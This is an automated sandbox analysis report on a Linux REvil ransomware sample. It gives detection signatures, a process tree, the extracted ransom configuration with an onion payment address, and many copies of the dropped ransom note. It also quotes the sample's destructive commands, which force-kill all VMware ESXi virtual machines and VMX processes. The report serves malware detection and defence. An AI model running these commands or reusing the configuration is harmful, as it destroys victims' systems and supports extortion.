Joe Sandbox Cloud Pro Analysis Report

Loading ...

Play interactive tourEdit tour

Linux Analysis Report wQN5w2558L

Overview

General Information

Sample Name:wQN5w2558L
Analysis ID:1504951
MD5:395249d3e6dae1caff6b5b2e1f75bacd
SHA1:29f16c046a344e0d0adfea80d5d7958d6b6b8cfa
SHA256:ea1872b2835128e3cb49a0bc27e4727ca33c4e6eba1e80422db19b505f965bc4
Infos:

Most interesting Screenshot:

Detection

REvil
Score:76
Range:0 - 100
Whitelisted:false

Signatures

Found malware configuration
Yara detected REvil Linux Ransomware
Creates a notice file (html or txt) to demand a ransom
Found Tor onion address
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample reads from .bash_history
Tries to kill VMware ESXi VMs
Creates hidden files and/or directories
Enumerates processes within the "proc" file system
Executes the "hostname" command used to retrieve the computers name
Executes the "kill" or "pkill" command typically used to terminate processes
Reads CPU information from /sys indicative of miner or evasive malware
Sample has stripped symbol table
Sample tries to set the executable flag
Tries to execute "esxcli" command used for VMware ESXi administration
Uses the "uname" system call to query kernel version information (possible evasion)
Writes JavaScript files to disk

Classification

General Information

Joe Sandbox Version:
Analysis ID:1504951
Start date:01.07.2021
Start time:20:56:04
Joe Sandbox Product:Cloud
Overall analysis duration:0h 12m 1s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:wQN5w2558L
Cookbook file name:defaultlinuxinteractivecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Detection:MAL
Classification:mal76.rans.spre.evad.lin@0/507@0/0
Warnings:
Show All
  • Excluded IPs from analysis (whitelisted): 91.189.92.39, 91.189.92.38, 91.189.92.40, 91.189.92.41, 91.189.92.19, 91.189.92.20
  • Excluded domains from analysis (whitelisted): api.snapcraft.io
  • Report size exceeded maximum capacity and may have missing behavior information.

Process Tree

  • system is lnxubuntu1
  • exo-open (PID: 2755, Parent: 2123, MD5: 39c5fa78f1cb3d950b9944f784018d3a) Arguments: exo-open --launch TerminalEmulator
    • exo-open New Fork (PID: 2784, Parent: 2755)
      • exo-open New Fork (PID: 2785, Parent: 2784)
      • exo-helper-1 (PID: 2785, Parent: 1889, MD5: c27a648e34ba5ce625d064af015be147) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 --launch TerminalEmulator
        • xfce4-terminal (PID: 2794, Parent: 2785, MD5: cd860c0a24d13e4caacc08ebe89aa930) Arguments: /usr/bin/xfce4-terminal
          • gnome-pty-helper (PID: 2806, Parent: 2794, MD5: 4847c5390dc12d6acfdd19fef054f30a) Arguments: gnome-pty-helper
          • bash (PID: 2807, Parent: 2794, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: bash
            • bash New Fork (PID: 2824, Parent: 2807)
              • bash New Fork (PID: 2825, Parent: 2824)
              • lesspipe (PID: 2825, Parent: 2824, MD5: 80a46999efd72ca140acc1990050d65c) Arguments: /bin/sh /usr/bin/lesspipe
                • lesspipe New Fork (PID: 2829, Parent: 2825)
                • basename (PID: 2829, Parent: 2825, MD5: fd7bba8b11b99ec7559f30226c79a729) Arguments: basename /usr/bin/lesspipe
                • lesspipe New Fork (PID: 2831, Parent: 2825)
                  • lesspipe New Fork (PID: 2832, Parent: 2831)
                  • dirname (PID: 2832, Parent: 2831, MD5: 109f56157fe89667043fd1cca87b24fa) Arguments: dirname /usr/bin/lesspipe
            • bash New Fork (PID: 2833, Parent: 2807)
              • bash New Fork (PID: 2834, Parent: 2833)
              • dircolors (PID: 2834, Parent: 2833, MD5: 1c7070b855358283a329458ff4fbebab) Arguments: dircolors -b
            • bash New Fork (PID: 2863, Parent: 2807)
              • bash New Fork (PID: 2864, Parent: 2863)
              • ls (PID: 2864, Parent: 2863, MD5: f3b92d795c9ee0725c160680acd084d9) Arguments: ls /etc/bash_completion.d
            • bash New Fork (PID: 2873, Parent: 2807)
            • bash New Fork (PID: 2874, Parent: 2807)
            • bash New Fork (PID: 2875, Parent: 2807)
            • bash New Fork (PID: 2876, Parent: 2807)
            • bash New Fork (PID: 2877, Parent: 2807)
            • mv (PID: 2877, Parent: 2807, MD5: 0cdfdd010d5f4acab64a1d89066c92e9) Arguments: mv Desktop/wQN5w2558L .
            • bash New Fork (PID: 2888, Parent: 2807)
            • wQN5w2558L (PID: 2888, Parent: 2807, MD5: unknown) Arguments: ./wQN5w2558L
              • dash (PID: 2889, Parent: 2888, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "uname -a && echo \" | \" && hostname"
                • dash New Fork (PID: 2890, Parent: 2889)
                • uname (PID: 2890, Parent: 2889, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -a
                • dash New Fork (PID: 2891, Parent: 2889)
                • hostname (PID: 2891, Parent: 2889, MD5: 79300176c96052498937c20a23cef810) Arguments: hostname
              • dash (PID: 2894, Parent: 2888, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "uname -a && echo \" | \" && hostname"
                • dash New Fork (PID: 2898, Parent: 2894)
                • uname (PID: 2898, Parent: 2894, MD5: 1078d9dca4e90919f7b2433cae105008) Arguments: uname -a
                • dash New Fork (PID: 2942, Parent: 2894)
                • hostname (PID: 2942, Parent: 2894, MD5: 79300176c96052498937c20a23cef810) Arguments: hostname
              • dash (PID: 2951, Parent: 2888, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "pkill -9 vmx-*"
                • dash New Fork (PID: 2952, Parent: 2951)
                • pkill (PID: 2952, Parent: 2951, MD5: f3b843351a404d4e8d4ce0ed0775fa9c) Arguments: pkill -9 vmx-*
              • dash (PID: 2958, Parent: 2888, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list | awk -F \"\\\"*,\\\"*\" '{system(\"esxcli vm process kill --type=force --world-id=\" $1)}'"
                • dash New Fork (PID: 2963, Parent: 2958)
                • dash New Fork (PID: 2964, Parent: 2958)
                • awk (PID: 2964, Parent: 2958, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk -F "\"*,\"*" "{system(\"esxcli vm process kill --type=force --world-id=\" $1)}"
  • thunar New Fork (PID: 3040, Parent: 3039)
  • mousepad (PID: 3040, Parent: 3039, MD5: aa2bab7862768edb3685f57fdc81d9f2) Arguments: mousepad /home/user/Desktop/rhkrc-readme.txt
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
wQN5w2558LJoeSecurity_REvilLinuxYara detected REvil Linux RansomwareJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    2888.1.0000000000400000.0000000000415000.r-x.sdmpJoeSecurity_REvilLinuxYara detected REvil Linux RansomwareJoe Security

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 2888.1.0000000000615000.000000000061a000.rw-.sdmpMalware Configuration Extractor: REvil {"pk": "r58UPwgbaRk5py762WpY/rEsl1jd936THXwqUwID/iM=", "pid": "$2a$12$V3e/gZmP0hFlQhnJLAyOM.Fsb56ksfw0p42oLlNwf2Jou485ElO4K", "sub": "7987", "dbg": false, "et": 0, "nbody": "LS0tPT09IFdlbGNvbWUuIEFnYWluLiA9PT0tLS0KClsrXSBXaGF0cyBIYXBwZW4/IFsrXQoKWW91ciBmaWxlcyBhcmUgZW5jcnlwdGVkLCBhbmQgY3VycmVudGx5IHVuYXZhaWxhYmxlLiBZb3UgY2FuIGNoZWNrIGl0OiBhbGwgZmlsZXMgb24geW91ciBzeXN0ZW0gaGFzIGV4dGVuc2lvbiB7RVhUfS4KQnkgdGhlIHdheSwgZXZlcnl0aGluZyBpcyBwb3NzaWJsZSB0byByZWNvdmVyIChyZXN0b3JlKSwgYnV0IHlvdSBuZWVkIHRvIGZvbGxvdyBvdXIgaW5zdHJ1Y3Rpb25zLiBPdGhlcndpc2UsIHlvdSBjYW50IHJldHVybiB5b3VyIGRhdGEgKE5FVkVSKS4KClsrXSBXaGF0IGd1YXJhbnRlZXM/IFsrXQoKSXRzIGp1c3QgYSBidXNpbmVzcy4gV2UgYWJzb2x1dGVseSBkbyBub3QgY2FyZSBhYm91dCB5b3UgYW5kIHlvdXIgZGVhbHMsIGV4Y2VwdCBnZXR0aW5nIGJlbmVmaXRzLiBJZiB3ZSBkbyBub3QgZG8gb3VyIHdvcmsgYW5kIGxpYWJpbGl0aWVzIC0gbm9ib2R5IHdpbGwgbm90IGNvb3BlcmF0ZSB3aXRoIHVzLiBJdHMgbm90IGluIG91ciBpbnRlcmVzdHMuClRvIGNoZWNrIHRoZSBhYmlsaXR5IG9mIHJldHVybmluZyBmaWxlcywgWW91IHNob3VsZCBnbyB0byBvdXIgd2Vic2l0ZS4gVGhlcmUgeW91IGNhbiBkZWNyeXB0IG9uZSBmaWxlIGZvciBmcmVlLiBUaGF0IGlzIG91ciBndWFyYW50ZWUuCklmIHlvdSB3aWxsIG5vdCBjb29wZXJhdGUgd2l0aCBvdXIgc2VydmljZSAtIGZvciB1cywgaXRzIGRvZXMgbm90IG1hdHRlci4gQnV0IHlvdSB3aWxsIGxvc2UgeW91ciB0aW1lIGFuZCBkYXRhLCBjYXVzZSBqdXN0IHdlIGhhdmUgdGhlIHByaXZhdGUga2V5LiBJbiBwcmFjdGlzZSAtIHRpbWUgaXMgbXVjaCBtb3JlIHZhbHVhYmxlIHRoYW4gbW9uZXkuCgpbK10gSG93IHRvIGdldCBhY2Nlc3Mgb24gd2Vic2l0ZT8gWytdCgpZb3UgaGF2ZSB0d28gd2F5czoKCjEpIFtSZWNvbW1lbmRlZF0gVXNpbmcgYSBUT1IgYnJvd3NlciEKICBhKSBEb3dubG9hZCBhbmQgaW5zdGFsbCBUT1IgYnJvd3NlciBmcm9tIHRoaXMgc2l0ZTogaHR0cHM6Ly90b3Jwcm9qZWN0Lm9yZy8KICBiKSBPcGVuIG91ciB3ZWJzaXRlOiBodHRwOi8vYXBsZWJ6dTQ3d2dhemFwZHFrczZ2cmN2NnpjbmpwcGtieGJyNndrZXRmNTZuZjZhcTJubXlveWQub25pb24ve1VJRH0KCjIpIElmIFRPUiBibG9ja2VkIGluIHlvdXIgY291bnRyeSwgdHJ5IHRvIHVzZSBWUE4hIEJ1dCB5b3UgY2FuIHVzZSBvdXIgc2Vjb25kYXJ5IHdlYnNpdGUuIEZvciB0aGlzOgogIGEpIE9wZW4geW91ciBhbnkgYnJvd3NlciAoQ2hyb21lLCBGaXJlZm94LCBPcGVyYSwgSUUsIEVkZ2UpCiAgYikgT3BlbiBvdXIgc2Vjb25kYXJ5IHdlYnNpdGU6IGh0dHA6Ly9kZWNvZGVyLnJlL3tVSUR9CgpXYXJuaW5nOiBzZWNvbmRhcnkgd2Vic2l0ZSBjYW4gYmUgYmxvY2tlZCwgdGhhdHMgd2h5IGZpcnN0IHZhcmlhbnQgbXVjaCBiZXR0ZXIgYW5kIG1vcmUgYXZhaWxhYmxlLgoKV2hlbiB5b3Ugb3BlbiBvdXIgd2Vic2l0ZSwgcHV0IHRoZSBmb2xsb3dpbmcgZGF0YSBpbiB0aGUgaW5wdXQgZm9ybToKS2V5OgoKCntLRVl9CgoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiEhISBEQU5HRVIgISEhCkRPTlQgdHJ5IHRvIGNoYW5nZSBmaWxlcyBieSB5b3Vyc2VsZiwgRE9OVCB1c2UgYW55IHRoaXJkIHBhcnR5IHNvZnR3YXJlIGZvciByZXN0b3JpbmcgeW91ciBkYXRhIG9yIGFudGl2aXJ1cyBzb2x1dGlvbnMgLSBpdHMgbWF5IGVudGFpbCBkYW1nZSBvZiB0aGUgcHJpdmF0ZSBrZXkgYW5kLCBhcyByZXN1bHQsIFRoZSBMb3NzIGFsbCBkYXRhLgohISEgISEhICEhIQpPTkUgTU9SRSBUSU1FOiBJdHMgaW4geW91ciBpbnRlcmVzdHMgdG8gZ2V0IHlvdXIgZmlsZXMgYmFjay4gRnJvbSBvdXIgc2lkZSwgd2UgKHRoZSBiZXN0IHNwZWNpYWxpc3RzKSBtYWtlIGV2ZXJ5dGhpbmcgZm9yIHJlc3RvcmluZywgYnV0IHBsZWFzZSBzaG91bGQgbm90IGludGVyZmVyZS4KISEhICEhISAhISEA", "nname": "{EXT}-readme.txt", "rdmcnt": 0, "ext": ".rhkrc"}
      Source: ./wQN5w2558L (PID: 2888)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

      Networking:

      barindex
      Found Tor onion addressShow sources
      Source: bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93F57EC393F57EC3
      Source: bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93F57EC393F57EC3
      Source: bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpString found in binary or memory: http://decoder.re/93F57EC393F57EC3
      Source: recently-used.xbel.XEOG50.79.drString found in binary or memory: http://freedesktop.org
      Source: recently-used.xbel.XEOG50.79.drString found in binary or memory: http://www.freedesktop.org/standards/desktop-bookmarks
      Source: recently-used.xbel.XEOG50.79.drString found in binary or memory: http://www.freedesktop.org/standards/shared-mime-info
      Source: bash, 2888.1.000000000104f000.00000000010a7000.rw-.sdmpString found in binary or memory: https://torproject.org/

      Spam, unwanted Advertisements and Ransom Demands:

      barindex
      Yara detected REvil Linux RansomwareShow sources
      Source: Yara matchFile source: wQN5w2558L, type: SAMPLE
      Source: Yara matchFile source: 2888.1.0000000000400000.0000000000415000.r-x.sdmp, type: MEMORY
      Creates a notice file (html or txt) to demand a ransomShow sources
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/obexd/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/memos/trash/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/memos/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/calendar/trash/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/calendar/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/addressbook/trash/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/addressbook/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/sources/trash/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/sources/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file
      Source: ./wQN5w2558LFile dropped: /home/user/.cache/evolution/tasks/trash/rhkrc-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/93f57ec393f57ec32) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decoder.re/93f57ec393f57ec3warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:qagg18cdy3uhfybyvpqhhmi/var+n44etyekrcdic0wrlzrqqbqvlr+5/m86p+thzppupcc4nylht23Jump to dropped file

      Operating System Destruction:

      barindex
      Tries to kill VMware ESXi VMsShow sources
      Source: ./wQN5w2558L (PID: 2958)ESXcli VM kill: /bin/dash -> sh -c "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list | awk -F \"\\\"*,\\\"*\" '{system(\"esxcli vm process kill --type=force --world-id=\" $1)}'"Jump to behavior
      Source: /bin/dash (PID: 2964)ESXcli VM kill: /usr/bin/awk -> awk -F "\"*,\"*" "{system(\"esxcli vm process kill --type=force --world-id=\" $1)}"Jump to behavior
      Source: ./wQN5w2558L (PID: 2958)ESXcli executable: /bin/dash -> sh -c "esxcli --formatter=csv --format-param=fields==\"WorldID,DisplayName\" vm process list | awk -F \"\\\"*,\\\"*\" '{system(\"esxcli vm process kill --type=force --world-id=\" $1)}'"Jump to behavior
      Source: /bin/dash (PID: 2964)ESXcli executable: /usr/bin/awk -> awk -F "\"*,\"*" "{system(\"esxcli vm process kill --type=force --world-id=\" $1)}"Jump to behavior
      Source: ELF static info symbol of initial sample.symtab present: no
      Source: classification engineClassification label: mal76.rans.spre.evad.lin@0/507@0/0

      Persistence and Installation Behavior:

      barindex
      Modifies the '.bashrc' or '.bash_profile' file typically for persisting actionsShow sources
      Source: ./wQN5w2558L (PID: 2888)File written: /home/user/.bashrcJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 2785)Directory: /home/user/.cacheJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 2785)Directory: /home/user/.localJump to behavior
      Source: /usr/lib/x86_64-linux-gnu/xfce4/exo-1/exo-helper-1 (PID: 2785)Directory: /home/user/.configJump to behavior
      Source: /usr/bin/xfce4-terminal (PID: 2794)Directory: /home/user/.cacheJump to behavior
      Source: /usr/bin/xfce4-terminal (PID: 2794)Directory: /home/user/.localJump to behavior
      Source: /usr/bin/xfce4-terminal (PID: 2794)Directory: /home/user/.configJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/909/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/909/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2032/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2032/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2152/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2152/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1336/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1336/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2700/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2700/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/234/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/234/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1850/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1850/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/118/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/118/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/912/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/912/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/10/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/10/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2703/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2703/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/11/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/11/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/12/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/12/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/13/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/13/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/14/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/14/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/15/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/15/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/16/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/16/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/17/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/17/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/18/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/18/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/19/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/19/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2043/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2043/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/484/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/484/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/1/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/3/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/3/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2952/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/2952/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/4/statusJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/4/cmdlineJump to behavior
      Source: /usr/bin/pkill (PID: 2952)File opened: /proc/367/statusJump to behavior
